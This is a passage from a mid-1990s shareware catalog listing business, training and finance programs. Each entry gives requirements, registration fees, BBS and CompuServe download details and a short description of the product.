PRICE BOOK + Author: , 407-291-3960 + Version: 4.50+ (12-01-93) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $50.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + + Chapter 7, "Business" 326 + + + + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOBE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOBE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + A system of creating and maintaining specialized pricing for + your customer/clients. Special printouts (price books/catalogs) + may be printed to a standard printer, or to a Hewlett Packard + (tm) Laserjet or compatible. It requires the presence of DAYO + Inventory and DAYO POS programs/databases. Special price book + methods include fixed, margin/cost plus, and list/retail + discounts. + + + Product: Folders + Personal information manager network email. See full + description on page 142. + + Product: Judy's TenKey + Powerful, flexible Windows calculator. See full description on + page 123. + + Product: ProAct Contact Management + Home/business contact manager. See full description on + page 326. + + Product: WebForms + WWW forms generator! See full description on page 374. + + + 7.12 Marketing + + Product: ListBuilder + Contact manager for building a Network. See full description + on page 143. + + Chapter 7, "Business" 327 + + + + Product: ProAct Contact Management + Author: , 203-233-0705 + Version: 2.6 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; Hard disk. + Strongly recommended: EMS memory; XMS memory. + Registration fee: $40.00 (add $5.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, mail support; 1-month return + policy; discounts on upgrades. 12-month free upgrading allowed. + Look for: PRACT26*.ZIP on BBSs (multiple files) (call + 703-680-9269 to download it at no charge); PRACT.ZIP on + CompuServe in CIS:PCAPP forum LIBrary 4 (or contact userID + 74650,3623 for assistance). + SWREG#: 2046 + PsL#: 11212 + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + Powerful home or business contact profiler, scheduler, and + merge letter/document word processor. Organize contacts by + company and name. Profile contacts by 10 categories. Apply + and batch process "action plans" for one or more contacts. + Includes three standard letter formats, user defined labels, + editable "Three Line Help", F1 Help, pick lists, and auto + dialing. Small demonstration program and tutorial included. + Multiple file sets so you can segregage home, office, or other + special groups. + + + Product: WebForms + WWW forms generator! See full description on page 374. + + + 7.13 Work-at-home + + See also: Home & hobby. + + Product: BusinessCards for Windows + Free form database for Windows. See full description on + page 138. + + Product: Day By Day + Scheduler, diary, task manager with password. See full + description on page 141. + + Product: Dear Diary + Diary/daily journal. See full description on page 150. + + Product: Electronic Postal Window(tm) + US postal rates look-up program. See full description on + page 333. + + Chapter 7, "Business" 328 + + + + Product: HOME/OFFICE INVENTORY + Author: , 203-233-0705 + Version: 1.0 (03-28-94) + Needs: IBM PC, DOS 3.3 or better. 520k RAM; EGA monitor; Hard + disk. + Registration fee: $21.50 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, mail support; 1-month return + policy; all ASP-wide offers (see page 5). + Look for: HOI10A.EXE on BBSs (multiple files) (call 718-837-3236 + to download it at no charge); HOI.EXE on CompuServe in + CIS:PCAPP forum LIBrary 0 (or contact userID 74650,3623 for + assistance). + SWREG#: 2342 + PsL#: 11236 + Download size: 690k (about 51 minutes with a 2400 baud modem) + Description: + An invaluable tool for recording and organizing personal or + business property data for insurance, tax, or maintenance + purposes. Includes inventory, insurance, business, and claim + information. Prepare claims including overhead and profit + calculations. Record warranty information. Track insurance + expirations, premiums, and monthly costs. Add notes to items, + claims, claim items, businesses, and dates. Mouse support, + color editing, redundant help systems. + + + Product: HortMan + Horticultural manager. See full description on page 538. + + Product: ListBuilder + Contact manager for building a Network. See full description + on page 143. + + Product: Little Black Book + Autodialer/'rolodex' program. See full description on + page 129. + + Product: Paper Route Ledger + Computer bookkeeping for newspaper carriers. See full + description on page 270. + + Product: ProAct Contact Management + Home/business contact manager. See full description on + page 326. + + Product: q&dBase for Windows + Database creation and maintenance program. See full + description on page 239. + + Chapter 7, "Business" 329 + + + + Product: Rockford! + Design business cards in Windows. See full description on + page 200. + + + 7.14 Training & support aids + + See also: Computer programming, Hypertext/hypermedia; + Education, Computers. + + Product: Crossword Clipper for DOS + Crossword puzzle layout/publishing tool. See full description + on page 197. + + Product: Crossword Clipper for Windows + Crossword puzzle layout/publishing tool. See full description + on page 197. + + Product: Crossword Creator + Multi-lingual crossword puzzle editor. See full description on + page 462. + + Product: LEADING AND MANAGING OTHERS + Author: , 216-632-5447 + Version: 1.0 (09-19-94) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; Hard disk; + Mouse; sound card. MPC-compatible sound card. + Registration fee: $22.00 + Registration benefits: 31/2" master disk(s); lifetime unlimited + tollfree 800# phone, mail support; 1-month return policy; bonus + utilities; all ASP-wide offers (see page 5); discounts on other + products. 12-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: CSLMO.ZIP on BBSs; CSLMO.ZIP on CompuServe in CIS:IBM + APPS forum LIBrary 7 (or contact userID 71031,1036 for + assistance); CSLMO.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 705k (about 53 minutes with a 2400 baud modem) + Description: + A multimedia seminar on disk for leaders and managers at all + levels. Includes basic instruction in leadership and management + - plus "how-to" features, automatically scored quizzes, a self- + assessment, readings, and much more. + + + Product: Notice Board + Notice board/information system for LANs. See full description + on page 385. + + Chapter 7, "Business" 330 + + + + Product: QA Study Aid [***] + Author: , 319-378-9140 + Version: 5.3 (10-14-95) + Needs: IBM PC, DOS 3.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. An ASCII editor program such as EDIT + (included with DOS 5.0 & later). + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $20.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; 3 months of + unlimited phone, CompuServe, mail support; discounts on + upgrades. 1-month free upgrading allowed. + Look for: QASA??.ZIP on BBSs (call 509-946-9848 to download it at + no charge); QASA??.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 11 (or contact userID 73760,2032 for assistance). + SWREG#: 502 + Download size: 240k (about 18 minutes with a 2400 baud modem) + Description: + A computer-based test creation and execution system. Test + databases of questions/answers are created with external editor + using easy rules. Has compiler and test interpreter, presents + compiled test, scores all answers and can record results in a + score file. All data encrypted or password protected. Scores + may be exported. Supports all question types but essay. Can + create random subsets. Has weighting, letter grade relations, + correct answer display with help, review/correct mode, more. + + + 7.14.1 Lecturing & slide shows + + See also: Writing applications, Creativity & brainstorming; + Graphics, Presentation graphics. + + Product: Lecture + Author: , 618-632-7345 + Version: 1.02 (12-14-92) + Needs: IBM AT (80286), Windows 3.0 or better. Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $29.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 12 months of unlimited phone, fax, CompuServe, + newsletter, mail support; 1-month return policy; all ASP-wide + offers (see page 5); discounts on other products. + Look for: LECT-102.ZIP on BBSs (call 618-632-2339 to download it + at no charge); LECTUR.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 10 (or contact userID 74017,1344 for assistance); + + Chapter 7, "Business" 331 + + + + LECTR100.ZIP on GEnie in IBMPC forum LIBrary 1 (or contact + userID R.ROSENBERGE for assistance). + SWREG#: 834 + PsL#: 10562 + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + Provides a much-needed text-based lecturing capability in + Windows. Replaces transparencies and foils! Other + presentation packages focus on graphics and overwhelm users + with complexities and high price tags. This program reads + standard ASCII files and displays text presentations in a + window. Mouse support lets you walk around freely as you "flip + slides." + + College teachers, businessmen, Toastmasters, and many others + who give text-based lectures will find this program extremely + useful. + + + Product: Prompter - Speaker's Utility + Author: , 805-528-1759 + Version: 1.2 (06-11-93) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; VGA monitor; + Mouse; VBRUN300.DLL. + Registration fee: $25.00 + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited tollfree 800# phone, fax, BBS, CompuServe, + mail support; lifetime return policy; all ASP-wide offers (see + page 5). Lifetime free upgrading allowed. + Look for: PROMPTER.ZIP on BBSs (call 805-528-3753 to download it + at no charge); PRMPTR.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71571,222 for assistance). + Download size: 57k (about four minutes with a 2400 baud modem) + Description: + A complete speech editor and prompter for Windows. Create, + rehearse and deliver speeches and lectures just like the + professionals do. Any key pauses and restarts scrolling. Adjust + scroll rate while you speak. Elapsed time and estimated time + displays. Print speeches, too. Any font, any size, any scroll + rate. + + Chapter 7, "Business" 332 + + + + 7.14.2 Job interviewing + + Product: You're Hired! + Author: , 612-894-7088 + Version: 1.33 (02-05-95) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $26.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, CompuServe, + mail support; bonus utilities; all ASP-wide offers (see + page 5); discounts on other products. 3-month free upgrading + allowed. + Look for: YH133.ZIP on BBSs (call 715-652-2758 to download it at + no charge); YHIRED.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 7 (or contact userID 73510,3077 for assistance). + PsL#: 10876 + Download size: 209k (about 16 minutes with a 2400 baud modem) + Description: + An informative and comprehensive job interview simulator that + provides realistic training to prepare you for your next job + interview. The Program asks you challenging questions and + records elapsed times as you verbally respond. If you need help + answering a question, press a key to receive professional + advice and to view your own notes. You can also add or change + the questions and advice, and create customized interviews that + ask only select questions. Practice anywhere with a printed + copy. + + + 7.14.3 "Help desk" applications + + See also: Computer programming, Programming utilities, Desktop + tools for programmers. + + Product: DeskTop Advisor(R) + Create/browse popup hypertext w/images, sound. See full + description on page 424. + + + 7.15 Simulators & what-ifs + + Product: Virus Simulator + Safely audit & demonstrate virus protection. See full + description on page 169. + + Product: WALL STREET RAIDER + Stock market/corporate takeover simulation. See full + description on page 623. + + Chapter 7, "Business" 333 + + + + 7.16 Business utilities + + Product: BusinessCards for Windows + Free form database for Windows. See full description on + page 138. + + Product: Button Manager for Windows + Icon-driven Windows application launcher. See full description + on page 165. + + Product: Cards+More + Labels and cards printing. See full description on page 486. + + Product: DARN! Don't Forget! + Events Reminder for Windows. See full description on page 140. + + Product: DAYO SMART REPORTS + `Smart' reports & routines for DAYO. See full description on + page 337. + + Product: DDE Requester for Win3.x & NT + DDE history recorder to access1.1 MDB or text. See full + description on page 355. + + Product: Electronic Postal Window(tm) + Author: , 607-533-4685 + Version: 1.6 (07-09-95) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; Mouse. + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of unlimited BBS, CompuServe, newsletter, mail support; + 1-month return policy; bonus utilities; bonus data; all ASP- + wide offers (see page 5); discounts on upgrades. + Look for: EPW15.ZIP on BBSs (call 607-533-7072 to download it at + no charge); EPW16.ZIP on CompuServe in CIS:USEN forum LIBrary + 10 (or contact userID 71333,1577 for assistance). + Download size: 507k (about 38 minutes with a 2400 baud modem) + Description: + US postal rates look-up program. Enter the weight of your + mailing piece and the postage is automatically displayed. All + classes of mail. Comparison feature shows most economical + postage. Country lookup for foreign mailings. Fun facts about + the Postal Service. + + + Product: EXPRESSGRAPH + Pie, line, bar charts for business apps. See full description + on page 505. + + Chapter 7, "Business" 334 + + + + Product: Fixed Asset Pro + Comprehensive fixed asset depreciation system. See full + description on page 269. + + Product: Judy's TenKey + Powerful, flexible Windows calculator. See full description on + page 123. + + Product: METRIC-X + Author: , 703-802-0088 + Version: 2.03 (09-01-93) + Needs: IBM PC, DOS 2.1 or better. 126k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; Dual 720k floppy drives; + Hard disk. + Registration fee: $24.95 (add $2.75 for shipping to U.S. + addresses) (add $2.75 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); 12 months of unlimited + tollfree 800# phone, fax, CompuServe, mail support; 1-month + limited return policy; royalty-free runtime license; LAN + license; site license. 3-month free upgrading allowed. + Look for: MX-203.ZIP on BBSs (call 703-425-2505 to download it at + no charge); MX-203.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 7 (or contact userID 71140,2416 for assistance). + Download size: 137k (about ten minutes with a 2400 baud modem) + Description: + This Metric-English-Metric conversion utility uses drop-down + menus to display/select any of 12 categories and 179 units of + measure. Noted for being very user-friendly and extremely + accurate. This program has been designated as an "accepted + metric conversion tool" by the U.S. Interagency Council on + Metric Policy's Metric Operating Committee (ICMP/ MOC) and is + currently the only conversion utility to carry this + distinction. Based upon ANSI/IEEE Std-268-1992. + + + Product: Personal Time Card + Electronic time card. See full description on page 147. + + Product: q&dBase for Windows + Database creation and maintenance program. See full + description on page 239. + + Product: Simply Labels + Free form label program with many features. See full + description on page 79. + + Product: Vehicle Costs + Reports on costs involved with vehicle use. See full + description on page 293. + + Chapter 7, "Business" 335 + + + + Product: WinUpD8R + Work/home file transfer/update/backup utility. See full + description on page 24. + + Product: Zippidy Do Da(tm) [***] + Zipcode/areacode lookup tool with time info. See full + description on page 260. + + 7.16.1 Weights & measurements + + See also: Utilities, Desktop utilities, Calculators; Finances, + Financial calculators. + + Product: Convert It!(tm) SE [***] + Author: , 918-241-2301 + Version: 3.0b (03-17-95) + Needs: IBM 80386, Windows 3.1 or better. 2048k RAM; Hard disk. + Registration fee: $15.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of phone, CompuServe, mail support; 1-month return + policy; all ASP-wide offers (see page 5); discounts on other + products; discounts on upgrades. + Look for: CV302.ZIP on BBSs (call 918-747-2542 to download it at + no charge); CONVIT.ZIP on CompuServe in CIS:WINPROD forum + LIBrary 6 (or contact userID 72644,2335 for assistance). + SWREG#: 5108 + Download size: 324k (about 24 minutes with a 2400 baud modem) + Description: + Unit of measure conversion utility for MS Windows. 15 groups of + conversions with one more for custom conversions. You can edit + the conversion factors, add or delete units. Customize it for + the way YOU work. Turn conversion groups off/on. You can even + turn off/on individual conversion factors! Conversions include: + temperature, velocity, density, money, power, force, distance, + and more. On-line context sensitive help. In use by many + Fortune 500, FedGov, NASA and many others. + + + 7.17 Software tools & add-ins + + 7.17.1 For multiple programs + + Product: QUIK-INSTALL + 7k application install program! Many features. See full + description on page 429. + + Chapter 7, "Business" 336 + + + + 7.17.2 For other + + Product: DAYO INDEX + Author: , 407-291-3960 + Version: 4.50+ (02-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $40.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOXE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOXE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + Designed to manage the indexing of the DAYO databases. DAYO + applications all have multiple indexes, and because it is + recommended that they be reindexed at least once daily, this + was created to simplify this process. + + + Product: DAYO PASSWORDS + Author: , 407-291-3960 + Version: 4.50+ (01-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. DAYO modules. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of phone, fax, BBS, CompuServe, + mail support; LAN license; site license; bonus utilities; bonus + data; discounts on other products; discounts on upgrades. + 1-month free upgrading allowed. 1 free update disk(s) sent + out. + Look for: DAYOIDE.EXE on BBSs (call 407-292-4921 to download it + at no charge); DAYIDE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + Provides DAYO Business Application users with a system of + database security through the use of passwords. Its use is + optional, but recommended in areas where more than one person + has access to the data. + + Chapter 7, "Business" 337 + + + + Product: EXTENDED BATCH LANGUAGE-PLUS! + The real batch language you wish DOS had. See full description + on page 102. + + + 7.18 Other + + Product: DAYO SMART REPORTS + Author: , 407-291-3960 + Version: 4.51+ (12-01-93) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $75.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYORE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYORE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + Contains many reports/routines that will help you manage your + purchasing, inventory, invoices, backorders, sales, and your + databases. There are many reports, lists and routines included + in smart reports, ie: single warehouse, valuation expanded, + reorder, late PO, margin (history), vendor list, customer list, + inventory item list, expenses list, warehouse adjustments, HP + laser pull sheet, available inventory, GL posting problems, + view reports on screen, and many more! + + Chapter 8, "Finances" 338 + + + + + + Chapter 8 + Finances + + See also: Spreadsheet applications; Mathematics; Business. + + + 8.1 Stock trading & analysis + + Product: Capital Gainz + Investment portfolio manager. See full description on + page 351. + + Product: DDE Requester for Win3.x & NT + DDE history recorder to access1.1 MDB or text. See full + description on page 355. + + Product: THE FEELING'S MUTUAL-DOS + Mutual fund database/investment analysis. See full description + on page 341. + + Product: THE FEELING'S MUTUAL-Macintosh + Mutual fund database/financial planner. See full description + on page 341. + + Product: THE FEELING'S MUTUAL-WINDOWS + Mutual fund database/financial planner. See full description + on page 342. + + Product: PC Chart + Author: , 604-299-1010 + Version: V1.5 (07-15-93) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives; Hard disk; HP + DeskJet printer; HP LaserJet printer; Hayes-compatible modem. + Registration fee: $99.00 (add $7.00 for shipping to U.S. + addresses) (add $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, CompuServe, + GEnie, newsletter, mail support; all ASP-wide offers (see + page 5). + Look for: availability unknown on BBSs; PCE15.ZIP on CompuServe + in CIS:INVFORUM forum LIBrary 3 (multiple files) (or contact + userID 72717,1651 for assistance); PCC15.ZIP on GEnie in INVEST + forum LIBrary 3 (multiple files) (or contact userID G.QUONG for + assistance). + Download size: 720k (about 54 minutes with a 2400 baud modem) + Description: + An integrated technical analysis program that combines + charting, database and telecommunications capabiltities. + Generates stock charts and standard technical indicators such + as moving averages, RSI and Money Flow. Built-in + telecommunication capabilities can be used to download + + Chapter 8, "Finances" 339 + + + + historical, end-of-day, and intraday prices from CompuServe, + Dial/Data and GEnie. Supports PC Chart, ASCII and CSI data + formats and up to 400 files in one subdirectory. + + + Product: Personal Finances 2 + Full function personal/small business finance. See full + description on page 345. + + Product: Portfolio Manager + Powerful record system for your investments. See full + description on page 352. + + Product: StockQuest + Author: , 610.640.0339 + Version: 2.10 (07-25-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $19.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 5); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; STCKWZ.ZIP on CompuServe + in CIS:INVFORUM forum LIBrary 1 (or contact userID 76534,1166 + for assistance). + SWREG#: 6323 + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + Multi-dimensional stock price analyser. Using earnings, + growth, term and yield target, system calculates fundamental + stock values. "What-if" calculations. Easy to use. Shows + detail of underlying calculation. An essential tool for + validating stock investment and trading decisions. + + + Product: Total Investor for 1-2-3 DOS + Author: , 201-895-5665 + Version: 2.1 (11-12-93) + Needs: IBM PC, DOS 2.0 or better. 640k RAM; CGA monitor. Lotus + 1-2-3 version 2.0 or later; Quattro Pro. + Registration fee: $35.00 + Registration benefits: 51/4" master disk(s); 3 months of phone, + CompuServe support; bonus data. + Look for: TI123.ZIP on BBSs (call 312-280-8565 to download it at + no charge); TI123.ZIP on CompuServe in CIS:LOTUS forum LIBrary + 2 (or contact userID 76057,2400 for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + An integrated portfolio management and technical analysis + template for Lotus 1-2-3 and Quattro Pro. Keeps track of + securities, charts price trends, and makes buy/sell decisions + + Chapter 8, "Finances" 340 + + + + based on technical indicators. These indicators include moving + averages, relative strength, momentum, RSI, and many others. + Total Investor maintains both current and historical quotes. + Can be linked to Compuserve, Prodigy, DJN/R, Genie and Signal. + + + Product: Total Investor for 1-2-3 Window + Portfolio management and charting for 1-2-3. See full + description on page 230. + + Product: Total Investor for Symphony + Author: , 201-895-5665 + Version: 2.1 (09-10-93) + Needs: IBM PC, DOS 2.0 or better. 640k RAM; CGA monitor; Modem. + Lotus Symphony version 1.1 or later. + Strongly recommended: EMS memory. + Registration fee: $50.00 + Registration benefits: 51/4" master disk(s); 3 months of phone, + CompuServe support; bonus data. + Look for: TISYM.ZIP on BBSs (call 312-280-8565 to download it at + no charge); TISYM.ZIP on CompuServe in CIS:LOTUS forum LIBrary + 6 (or contact userID 76057,2400 for assistance). + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + An integrated portfolio management and technical analysis + template for Lotus Symphony. Can be used to keep track of + securities, chart stocks, and make buy/sell decisions based on + technical indicators. These indicators include moving averages, + momentum, relative strength, RSI, and many others. Updates both + current quotes for your portfolio and historical quotes for + charting and analysis through Dow Jones News Retrieval. + + + Product: Variable Investment Analyst + Comprehensive investment portfolio management. See full + description on page 352. + + Product: Wall Street Simulator - Windows + Author: + Version: 1.00 (06-25-94) + Needs: IBM 80386, Windows 3.0 or better. 640k RAM; EGA monitor; + Dual 720k floppy drives; VBRUN300.DLL. + Strongly recommended: VGA monitor; Hard disk; HP DeskJet + printer; HP LaserJet printer; Postscript printer; Mouse; Epson + printer; EMS memory; XMS memory. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited CompuServe, newsletter, mail support; 1-month return + policy; all ASP-wide offers (see page 5); discounts on other + + Chapter 8, "Finances" 341 + + + + products; discounts on upgrades. 1-month free upgrading + allowed. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; WSSW10.ZIP on CompuServe + in CIS:INVFOR forum LIBrary 0 (or contact userID 73577,115 for + assistance). + SWREG#: 2838 + Download size: 130k (about ten minutes with a 2400 baud modem) + Description: + Realistic simulation of a brokerage account. Allows trades to + be made using real market prices. Analyze results and compare + to other registered users. + + + 8.2 Personal finances + + See also: Business, Business finances. + + Product: Chris's Automobile Recorder + Vehicle operation & maint. logger & reminder. See full + description on page 566. + + Product: THE FEELING'S MUTUAL-DOS + Author: , 804-979-0245 + Version: 3.1.93 (04-01-94) + Needs: IBM PC, DOS 3.1 or better. 640k RAM; CGA monitor; Hard + disk; HP DeskJet printer; HP LaserJet printer; Postscript + printer; Epson printer. + Registration fee: $60.00 (add $2.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); lifetime unlimited phone, fax, CompuServe, newsletter, + mail support; 1-month limited return policy; bonus data; all + ASP-wide offers (see page 5); discounts on other products; + discounts on upgrades. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; TFM393.ZIP on CompuServe + in CIS:INVESTORS forum LIBrary 5 (or contact userID 70401,2062 + for assistance). + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + Provides a straight-forward presentation of mutual fund + investment alternatives. Designed for investors of all levels + of experience. Search for funds which meet given criteria or + your personal profile. Includes risk and load adjusted + analysis. Detailed information on over 150 funds (800 in + expanded version). Comes with on-line help, newsletter, + references, sample projections and fund family information. + + Chapter 8, "Finances" 342 + + + + Product: THE FEELING'S MUTUAL-Macintosh + Author: , 804-979-0245 + Version: 3.1.93 (04-15-94) + Needs: Macintosh, System 6.0.0 or better. 1000k RAM. Macintosh + Plus or better. + Strongly recommended: Hard disk. + Registration fee: $60.00 (add $2.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; 31/2" master disk(s); lifetime + unlimited phone, fax, CompuServe, newsletter, mail support; + 1-month limited return policy; bonus data; all ASP-wide offers + (see page 5); discounts on other products; discounts on + upgrades. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs. + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + Provides a straight-forward presentation of mutual fund + investment alternatives. Designed for investors of all levels + of experience. Search for funds which meet given criteria or + your personal profile. Includes risk and load adjusted + analysis. Detailed information on over 150 funds (800 in + expanded version). Includes on-line help, newsletter, + references, sample projections and fund family information. + + + Product: THE FEELING'S MUTUAL-WINDOWS + Author: , 804-979-0245 + Version: 3.1.93 (04-01-94) + Needs: IBM PC, Windows 3.0 or better. 2000k RAM; VGA monitor; + Hard disk; HP DeskJet printer; HP LaserJet printer; Postscript + printer; Mouse; Epson printer; XMS memory. + Registration fee: $60.00 (add $2.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); lifetime unlimited phone, fax, CompuServe, newsletter, + mail support; 1-month limited return policy; bonus data; all + ASP-wide offers (see page 5); discounts on other products; + discounts on upgrades. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; TFM393.ZIP on CompuServe + in CIS:INVESTORS forum LIBrary 5 (or contact userID 70401,2062 + for assistance). + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + Provides a straight-forward presentation of mutual fund + investment alternatives. Designed for investors of all levels + of experience. Search for funds which meet given criteria or + your personal profile. Includes risk and load adjusted + analysis. Detailed information on over 150 funds (800 in + expanded version). Includes on-line help, newsletter, + references, sample projections and fund family information. + + Chapter 8, "Finances" 343 + + + + Product: Financial Analysis For Windows + Author: , 360-599-2418 + Version: 4.0 (08-01-95) + Needs: IBM 80386, Windows 3.1 or better. 4k RAM. + Strongly recommended: Hard disk; Mouse. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited phone, CompuServe support; 1-month + return policy; discounts on upgrades. + Look for: WINFIN*.ZIP on BBSs; WINFIN.ZIP on CompuServe in + CIS:INVFORUM forum LIBrary 2 (or contact userID 70135,1052 for + assistance). + SWREG#: 1627 + PsL#: 20337 + Download size: 600k (about 45 minutes with a 2400 baud modem) + Description: + * Mortgage & rule-78 with amortization + * Bonds, bond ladder, T-bills, CDs, BAs + * Black-Scholes options with ability to calc implied + volitility + * Portfolio hedge - buy an index put to protect your stocks + * IRR, MIRR, NPV with 1,900+ cash flows allowed + * Retirement planning: payout increases each year w/ + inflation + * Auto lease- select variable to solve + * Days between dates arithmetic, 50 year calendar + * Random number generator + * Plain vanilla: annuity & compound interest + + Chapter 8, "Finances" 344 + + + + Product: Home Refinancing + Author: , 203-233-0705 + Version: 1.2 (03-21-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; CGA monitor; Hard + disk. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $34.00 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 